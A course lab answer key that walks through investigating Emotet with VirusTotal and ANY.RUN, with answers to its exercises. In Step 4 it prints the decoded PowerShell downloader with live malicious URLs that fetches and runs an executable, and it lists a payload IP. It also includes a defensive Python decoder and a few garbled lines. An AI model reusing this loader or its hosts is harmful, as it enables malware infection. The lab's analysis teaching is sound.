9.4.5 Lab – Online Malware Investigation Tools Answers

Objectives

  • Part 1: Perform Static Malware Analysis
  • Part 2: Perform Dynamic Malware Analysis
  • Part 3: Investigate the Exploit

Introduction

There are many malware analysis tools that are available online. These tools provide reference and analysis functions. For example, you can submit indicators of compromise (IOC), such as file hashes, URLs, or IP addresses, and the tool will look up the IOC and return information about exploits that share these characteristics. Suspicious files can also be submitted. Static malware analysis can submit the file to a collection of antivirus programs and return the results. Further analysis may also be conducted by dissecting the files at the binary level. Online sandboxes will conduct dynamic malware analysis in which the malware exploit is actually run in the same way that it infects a vulnerable host computer. This is done by executing the malware in a virtual machine with special tools that monitor the behavior of the malware. This is known as a malware sandbox.

Dynamic malware analysis provides rich insights into the behavior of the malware and the artifacts that it creates. This information can be used to identify new or updated versions of malware, evaluate the effects of an infection, and lead to discoveries of further exploits. For example, some malware is used as a delivery service for other malware exploits. The delivery service malware may be identified, but the malware that it has delivered may not be. Dynamic analysis can reveal what was delivered and the exploit can be further investigated. In this lab, you will use two online malware investigation tools to learn about an exploit.

Scenario

You are working at XYZ, Inc. as a cyber technician. You have been asked to help a cybersecurity analyst evaluate security alerts that have been generated by your Intrusion Prevention System (IPS). The IPS has flagged a series of events as potentially malicious. The analyst has provided you with a group of potential IOCs to investigate. You are using two online tools to perform static and dynamic analysis based on the IOCs. While it is also possible to submit malware files, the analyst feels it is better for you to use the IOCs until you have more experience handling real malware files.

Required Resources

  • 1 PC with internet access
  • CSE-LABVM

Instructions

Part 1: Perform Static Malware Analysis

In this part, you will submit a file hash to an online service that will look up the hash and return information about the associated malware file. The file hash is a computed representation, or fingerprint, of a file. File hashes are unique to the file contents and extremely difficult to duplicate.

Step 1: Submit the hash.

In this step, you will submit the hash value to a static malware analysis tool that provides you with further information about the malware file if it is known to the tool.

a. Start the CSE-LABVM.

b. Open a web browser and navigate to the VirusTotal site.

c. The file hash that you have received is:

05383088d0d46a5b5f4de852703601a6c39f04844ab63a1850197fcb011f3c81

Select and copy the hash value. Click the Search entry on the VirusTotal menu and paste the hash into the search box. Press the Enter key to execute the search.

d. VirusTotal has information for the file, which means a file with the same hash has been previously submitted for analysis. You will see the results of the analysis.

Has malware entered the XYZ, Inc. network?
Yes. The file has been flagged as malicious.

In your job, what should you do now?
Immediately inform the cybersecurity team that an attack has occurred that is linked to this hash.

Step 2: Interpret VirusTotal information.

a. VirusTotal submits files that have been uploaded by the public to a number of antivirus agents for analysis. In this case it has submitted to 63 antivirus products.

How many of the antivirus products flagged the file as malicious? What does this tell you about the reliability of antivirus programs?

45. Some antivirus programs will not detect and block this malware from downloading on a system.

b. Select the Details tab. Here you can learn more about the file. Review the information provided. Note that some of this information may not be accurate and may require confirmation with other sites.

What type of file has the malware been identified as?

MS Word document

c. Switch to the Relations tab. Here you can see IOCs such as the IP addresses, websites, and domains that the malware attempted to contact. You will also see hashes for files that it created or downloaded from those domains. In addition, you can see files and processes that are related to execution of the malware on the host computer.

What is the first Domain that the malware makes an HTTP request to?

agavea.com.br

d. Switch to the Behavior tab. Review the information that is available here. Below the menu bar is a drop-down list that allows you to select information from different malware sandboxes. Drop the list down and select VMRay if it is not selected already.

The malware uses shell commands to open programs and processes. Locate the information about the shell commands that are executed during the exploit. This malware opens MS Windows PowerShell and passes a value to it.

What is unusual about that value?

It is a very long and apparently meaningless string of characters.

e. Click the Community tab. Look at the two submissions by thor. These are YARA signatures rendered by the THOR APT Scanner, a compromise assessment tool by Nextron Systems. Review the signatures. You don’t need to understand everything in them.

What are YARA signatures?

YARA signatures contain binary or text patterns that identify different types of malware. YARA scanning software uses these signatures to identify malware files that are on computer systems.

From the description fields in the YARA signatures, what can you learn about how the malware uses PowerShell?

As shown in the description fields of the two entries, it uses a VBA macro to send a Base64-encoded shell command to PowerShell.

Part 2: Perform Dynamic Malware Analysis

Now we will use another tool to review the results of a dynamic analysis on a malware file that was submitted by the community. ANY.RUN is a company that offers a unique online dynamic and interactive sandbox. ANY.RUN offers a free service in which community users can upload suspected malware files for analysis. It provides a very rich set of analyses that provide a view into the behavior of the malware. Subscribers to the full version of ANY.RUN are able to run the malware on a virtual machine and interact with the malware if user actions are required to trigger it. Free users are only able to run malware samples on a 32-bit Windows 7 virtual machine; paying subscribers can choose the operating system that fits their environment.

The ANY.RUN sandbox will dynamically run the malware and display details of what the malware does in the analysis interface. Paying users can also interact with the sandbox VM in which the malware is run. They can respond to prompts from the malware and inspect the infected operating system.

Like VirusTotal, you can look up IOCs to see the results of previously completed dynamic or interactive analyses. In this part of the lab, we will submit the same file hash to ANY.RUN and review the results.

Step 1: Access ANY.RUN and Submit IOC

a. In a web browser, navigate to ANY.RUN. Click Service from the horizontal menu to move to the sandbox service interface.

b. ANY.RUN provides a real-time dashboard of the current malware threat landscape with statistics regarding the distribution of malware threats and the ratio of recent submissions that have been determined as malicious, suspicious, or no threat. Clicking one of the countries in the map will show the list of public submissions from that country. Community users can view detailed analysis for each submission. Become familiar with this dashboard.

Step 2: Submit the IOC and review results

a. To search the public tasks for our IOC, click Public Tasks in the menu on the left.

b. Here, you can see the list of public tasks that can be accessed. They are arranged by the most recent submission. The tasks are labelled with the analysis verdict: some are confirmed to be malicious, others are benign files, and others are suspicious.

c. Paste the hash from Part 1 into the search box in the upper right of the window and press enter.

d. You will see a page of malware exploits that have an artifact that corresponds to the hash value.

Scroll through the list of public submissions. What is the name of the file that corresponds to the hash? Is there only one?

Data-5544-J5823545.doc and DocX69688X4511225.doc. Filenames are not part of the hash value, only the file contents are hashed. So be aware that files with different names could possibly be the same file in reality.

e. Locate the entry that is dated 01 June 2019 for file Data-5544-J5823545.doc. Click that entry.

Note: ANY.RUN executes the malware in their sandbox. Sometimes the malware does not execute fully, so some submissions will not include details of the entire exploit. For example, if access to a command-and-control (CnC or C2) server on the internet is required, it is possible that the server will not be available. If that is the case, the exploit may cease execution before it has reached its goal. For this reason, it is important to look at several of the entries in the search results to find one that appears to have fully run.

Step 3: Explore the interface

The ANY.RUN analysis interface provides very deep insights into many aspects of the malware behavior.

a. The computer desktop that is shown consists of a series of screen grabs of the computer desktop at different stages of the malware infection process. Mouse over the image and move the mouse right or left to move through the screenshots. In many cases, there is nothing to see because the malware displays nothing on the screen as it works. Sometimes, if user input is required to execute the malware, instead of a screen grab, you may see a movie that captures the user actions that were conducted as part of the malware infection process.

Review the screens from start to finish. From what you see in the screens, what seems to be the first part of the virus infection process?

It appears that an MS Word document is part of the process. The file requests that editing and content be enabled. It is possible that the file contains a malicious macro as part of the infection process.

b. On the right-hand side of the screen, you will see a group of blue bars that are displayed in a nested tree-like structure. This is a process tree. It shows all the software processes that were used in the exploit. Some of them are Windows software components, and others are part of the malware.

c. Click the first process in the tree. Information about this process appears below the tree. Click the More Info button to see additional details for the process.

Which process is this?

winword.exe, which is the Microsoft Word application.

Look at the command line. Which file was passed as an argument to the command that runs MS Word?

Data-5544-J5823545.doc, the file that corresponds to the hash that we submitted.

What role do you think this document file played in the malware exploit? Feel free to search the web for your answer.

Microsoft Office files may include macros that are written in Visual Basic for Applications (VBA). VBA is a full-featured programming language that can perform powerful operations on a Windows computer. Threat actors insert malicious VBA code in innocent-looking documents. The code can be run if the user activates macros after opening the file. This begins the sequence of events that leads to the infection of the computer. This is why it is very important to only activate content in a file that you trust completely.

Step 4: Analyze an Obfuscated Script

a. Close the More Info window by clicking the “x” in the upper right-hand corner. Click the process immediately below the MS Word process. Click More Info to view the details.

What is the name of the process? What is its purpose?

powershell.exe. PowerShell provides a powerful command line interpreter for Windows. It is a replacement for the command prompt utility (cmd.exe) that originated with DOS.

PowerShell is often used by threat actors in living-off-the-land (LotL) attacks. What is an LotL attack, and how does PowerShell enable these attacks? Use the internet to search for answers as needed.

A LotL attack uses legitimate software that is already installed on a system for malicious purposes. Attacks that use existing legitimate software may be harder to detect than attacks that rely solely on malicious executables. PowerShell enables these attacks by providing a command line that can run scripts and executables.

b. In the Advanced Details of Process (More Info) window, look at the command line entry. This is the command that was issued by the malware macro in the Word document. You can see the powershell command and two arguments that were passed to the command, and then the long string that we saw

c. Copy the string using the copy icon next to the heading Command line.

d. Open a terminal and save the copied text into a text file named text with the echo command. The file name text is used as an example for this activity.

cisco@labvm:~$ echo "copied command line" > text

where "copied command line" is the PowerShell command that you copied.

e. Open the file text using a text editor. A GUI based text editor, Pluma, is available on this VM.

f. In the text file, remove the string, powershell -nop -e. Save and close the file.

g. In the terminal, use the command base64 -d to decode the Base64 data as text, and redirect the output to a new text file, text_64. The file name text_64 is used as an example for this activity.

cisco@labvm:~$ cat text | base64 -d > text_64

h. In Pluma, open the text_64 file. You will see the decoded text shown below, but with different line wrapping depending on the width of your window.

$R3ZtKC='FCams3Q';$d1mU0azd = '184';$XMzUsP='PD2Qisza';$tZTLXzZq=$env:userprofile+'/'+$d1mU0azd+'.exe';$zlBUq6='Q0HuEwi';$pTl4Jz=.('n'+'e'+'w-object')
nET.W`EbC`Li`Ent;$NUzAMAR='http://agavea.com.br/font/tMfyxzMEnQ/@http://news-week.ru/2018/wvq6nzd_kywgcjzgi-273/@http://ab.fitzio.com/cgi-
bin/opiFtEAsf/@http://palmbeachresortcebu.com/wp-content/uploads/t9smfqj3_blm4xo-69526194/@http://thingsmadeforyouapps.com/wp-
admin/VpVOXxek/'.SPLit('@');$NOBJJj='Eo1jszRQ';foreach($j5YzrQKQ in $NUzAMAR){try{$pTl4Jz.DOwNlOADfiLe($j5YzrQKQ, $tZTLXzZq);$SHHj3v='Mpi_Cz1s';If ((.
('G'+'et'+'-Item') $tZTLXzZq).LenGTh -ge 31421)
{[Diagnostics.Process]::sTarT($tZTLXzZq);$s1EoklR='fL2dzmIj';break;$TQ0NStMF='mANFqY'}}catch{}}$Zi7lBM='qFLbpU'

i. The text is still a bit hard to read, but you can probably pick out some familiar features. We will use the text editor to make it a bit easier to read.

1) Click Search > Replace.

2) Enter ; (semicolon) in the Search for field.

3) Enter \n (a newline) in the Replace with field.

4) Select the checkbox Match regular expression.

5) Click Replace All.

6) Finally, repeat the above steps for @. The "@" is used as a separator in one particularly long statement. Type @ in the Search for field and replace it with \n.

The formatted code should look like this:

1 $R3ZtKC='FCams3Q'
2 $d1mU0azd = '184'
3 $XMzUsP='PD2Qisza'
4 $tZTLXzZq=$env:userprofile+'/'+$d1mU0azd+'.exe'
5 $zlBUq6='Q0HuEwi'
6 $pTl4Jz=.('n'+'e'+'w-object') nET.W`EbC`Li`Ent
7 $NUzAMAR='http://agavea.com.br/font/tMfyxzMEnQ/
8 http://news-week.ru/2018/wvq6nzd_kywgcjzgi-273/
9 http://ab.fitzio.com/cgi-bin/opiFtEAsf/
10 http://palmbeachresortcebu.com/wp-content/uploads/t9smfqj3_blm4xo-69526194/
11 http://thingsmadeforyouapps.com/wp-admin/VpVOXxek/'.SPLit('
12 ')
13 $NOBJJj='Eo1jszRQ'
14 foreach($j5YzrQKQ in $NUzAMAR){try{$pTl4Jz.DOwNlOADfiLe($j5YzrQKQ, $tZTLXzZq )
15 $SHHj3v='Mpi_Cz1s'
16 If ((.('G'+'et'+'-Item') $tZTLXzZq).LenGTh -ge 31421) {[Diagnostics.Process]::sTarT($tZTLXzZq)
17 $s1EoklR='fL2dzmIj'
18 break
19 $TQ0NStMF='mANFqY'}}catch{}}$Zi7lBM='qFLbpU'

j. Save the file text_64 if desired.

Step 5: Interpret the Malware Script

Although the file is still hard to read because it uses random groups of characters for variable names and values, and also attempts to obfuscate commands by using erratic capitalization and other means, a little knowledge of programming can help you to get an idea of what is going on.

a. Notice that a series of URLs appear in the code. Submit several of them to ANY.RUN, VirusTotal, or another service to see if they are malicious.

b. Note that the variable $tZTLXzZq is assigned in line 4 of the code above. Its value is built by concatenating the user profile path, the value of $d1mU0azd, and the text '.exe'.

What is the value that is assigned to $tZTLXzZq in line 2?
184

Return to ANY.RUN. What is the next process below powershell?
184.exe

c. Look at line 14. The command is foreach ($j5YzrQKQ in $NUzAMAR).

What is the contents of the $NUzAMAR variable as assigned in lines 8 – 11?
The string of URLs.

then runs the downloaded file 184.exe.
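As an added example (not part of the lab or of ANY.RUN), the Python below does in code what Steps 4d to 4i and Step 5 do by hand: it recovers the script behind a powershell -nop -e command line, splits it into one statement per line, and pulls out the URL list, the dropped file name and the size check, then matches the download hosts against proxy log lines. The script, the command line and the log lines are constructed for this example, and the hostnames are placeholders rather than the real download sites from the report.

```python
import base64
import re
from urllib.parse import urlsplit

# Constructed sample modelled on the lab's de-obfuscated script. The hostnames
# are placeholders (.invalid TLD), not the real download sites from the report.
SAMPLE_SCRIPT = (
    "$R3ZtKC='FCams3Q';$d1mU0azd = '184';"
    "$tZTLXzZq=$env:userprofile+'/'+$d1mU0azd+'.exe';"
    "$pTl4Jz=.('n'+'e'+'w-object') nET.W`EbC`Li`Ent;"
    "$NUzAMAR='http://dl-a.invalid/font/x/@http://dl-b.invalid/wp-admin/y/'.SPLit('@');"
    "foreach($j in $NUzAMAR){try{$pTl4Jz.DOwNlOADfiLe($j, $tZTLXzZq);"
    "If ((.('G'+'et'+'-Item') $tZTLXzZq).LenGTh -ge 31421)"
    "{[Diagnostics.Process]::sTarT($tZTLXzZq);break}}catch{}}"
)
# PowerShell's -e/-EncodedCommand takes Base64 of the UTF-16LE script; this is
# the form the Word macro hands to powershell.exe and the sandbox records.
SAMPLE_CMDLINE = "powershell -nop -e " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")

def decode_encoded_command(cmdline):
    """Recover the script behind 'powershell -nop -e <base64>'."""
    raw = base64.b64decode(cmdline.strip().split()[-1])   # payload is the last token
    # A plain 'base64 -d' leaves the UTF-16LE NUL bytes in the file; decode them away.
    if b"\x00" in raw:
        return raw.decode("utf-16le")
    return raw.decode("latin-1")

def split_statements(script):
    """Same effect as the lab's editor step: one ';'-separated statement per line."""
    return [s.strip() for s in script.split(";") if s.strip()]

URL_RE = re.compile(r"https?://[^\s'\"@]+")          # stops at the '@' separator
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")   # $var = 'literal'
EXE_RE = re.compile(r"\$(\w+)\+'\.exe'")              # ...+$var+'.exe'
SIZE_RE = re.compile(r"\.LenGTh\s+-ge\s+(\d+)", re.I)

def extract_urls(script):
    """The '@'-joined download list, split the way the script's SPLit('@') does."""
    return URL_RE.findall(script)

def dropped_filename(script):
    """Resolve the '$var + .exe' drop name (184.exe in the lab) from its constant."""
    consts = dict(ASSIGN_RE.findall(script))
    m = EXE_RE.search(script)
    return consts[m.group(1)] + ".exe" if m and m.group(1) in consts else None

def minimum_size(script):
    """Byte threshold below which the loop discards the download and tries the next URL."""
    m = SIZE_RE.search(script)
    return int(m.group(1)) if m else None

def proxy_hits(log_lines, urls):
    """Defender check: log lines in which a host contacted one of the download sites."""
    hosts = {urlsplit(u).hostname for u in urls}
    return [ln for ln in log_lines if any(h in ln for h in hosts)]

# Constructed proxy log lines for the check above.
SAMPLE_LOG = [
    "2019-06-01T10:02:11 10.0.0.7 GET http://dl-a.invalid/font/x/ 200 31900",
    "2019-06-01T10:02:15 10.0.0.8 GET http://intranet.invalid/ 200 5120",
]

if __name__ == "__main__":
    script = decode_encoded_command(SAMPLE_CMDLINE)
    print("\n".join(split_statements(script)))
    print(dropped_filename(script), minimum_size(script), proxy_hits(SAMPLE_LOG, extract_urls(script)))
```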

Step 6: View Details of Malware Connections and Known Threats

a. Below the desktop view are a series of tabs that provide details of the malware behavior. The first tab shows the network behavior and the known threats. Click the HTTP requests tab. It shows the processes that attempted to make connections over HTTP.

Note: Although you are working in a VM, it is not recommended that you attempt to connect to any of these URLs.

Which URL did powershell.exe successfully connect with? This will match one of the URLs in the de-obfuscated

http://agavea.com.br/font/tMfyxzMEnQ/

What process then starts to issue requests to the web?

sansidaho.exe

The new process attempts to communicate with a series of URLs. From which URL does the process download binary files?

http://142.4.198.249

b. Click the Connections tab. Here you can see a timeline of the connections that were made during the malware exploit. On the DNS tab, you can see the DNS requests that were made by the malware. Note that you can download PCAPs for the connections and DNS requests. These files can be opened in Wireshark for further review.

c. Click the Threats tab. Here you will see Suricata IDS/IPS alert messages, each identified by a signature identifier (SID). These alerts are triggered by various malware behaviors as detected by IDS/IPS rules. These messages are used by various network security monitoring platforms.

Part 3: Investigate the Exploit

We have investigated a number of characteristics of this exploit, but we have not learned much about the exploit itself. ANY.RUN maintains a malware encyclopedia called the Tracker. If a Tracker article exists for the malware sample, ANY.RUN links to the article.

Note: You may need to register for an account in Any.Run to view some of the features discussed in this part.

a. In the pane on the right-hand side of the interface, at the top, is a header that provides information about the malware, including the MD5 hash for the file, the time it took to run the exploit in the sandbox, and a series of tags. If you click a tag, you will be taken to a tasks search that will list all the submitted exploits that share that tag.

b. Under the tags are several buttons. Click IOC to see all the IOCs for the submitted malware. These IOCs are diagnostic for the exploit. Finding any of them in your network monitoring data can indicate an exploit.

c. Finally, below the tags is a link to Tracker. As indicated, the malware is known as Emotet. Click the link to read about Emotet and answer the questions below.

What type of malware is Emotet and what are its major functions?

Emotet is a type of trojan that does two things. It acts as a software worm that attempts to spread itself through local networks. It is also what is known as a "loader": a delivery system for other malware exploits. So, if an Emotet exploit is successful, it will be linked to another exploit.

Emotet displays polymorphism. What does that mean?

Polymorphism involves changing features of the malware to avoid signatures. This includes changing IOCs, strings or patterns in the code, and other features of operation. It can also continuously download new and different malware by communicating with a command-and-control server.

What is the attack vector that spread the malware to potential victims?

It is distributed by email as an MS Word document that has malicious VBA macros.

What should users know to avoid infecting their computers (and other hosts on the network) with Emotet?

Be suspicious of unusual emails. Be very careful with file attachments, and do not activate macros on MS Office documents that you are not 100% sure are from a known source. If the source email address is known, contact the sender to verify that they sent the file if you are not expecting it.

d. Return to the analysis page for the Emotet malware variant that we have been working with. Beneath the name of the malware file, you will see a series of tags. Click the Emotet tag. This will execute a search for other malware that has been identified as Emotet. Click into several of the Public Submission reports until you find several that appear to have successfully executed in the sandbox. You should see a number of HTTP requests that occurred during the infection process.

What do you see that is different in these submissions from the report that we analyzed?

IOCs are different. The infected MS Word document has different file names or may be compressed. The malware creates, downloads, and executes different executable files from different locations.

Reflection Questions

1. You have gained significant insight into the way that a sophisticated malware exploit works. What have you learned about such exploits in general (not necessarily Emotet specifically)?

Malware exploits are complex and use many processes such as communication with malware servers, creation and download of malware files, and modifications to the Windows system, including the registry.

2. Go online and investigate other sandbox applications, both online tools and locally run. Describe several other tools and what they do. Type your answers here.

Cuckoo Sandbox is a leading open-source automated malware analysis sandbox. It runs locally in a virtual machine. Intezer Analyze conducts dynamic analysis of malware files or IOCs. It provides reports similar to those of ANY.RUN. Joe Sandbox Cloud provides very detailed reports for uploaded malware files.
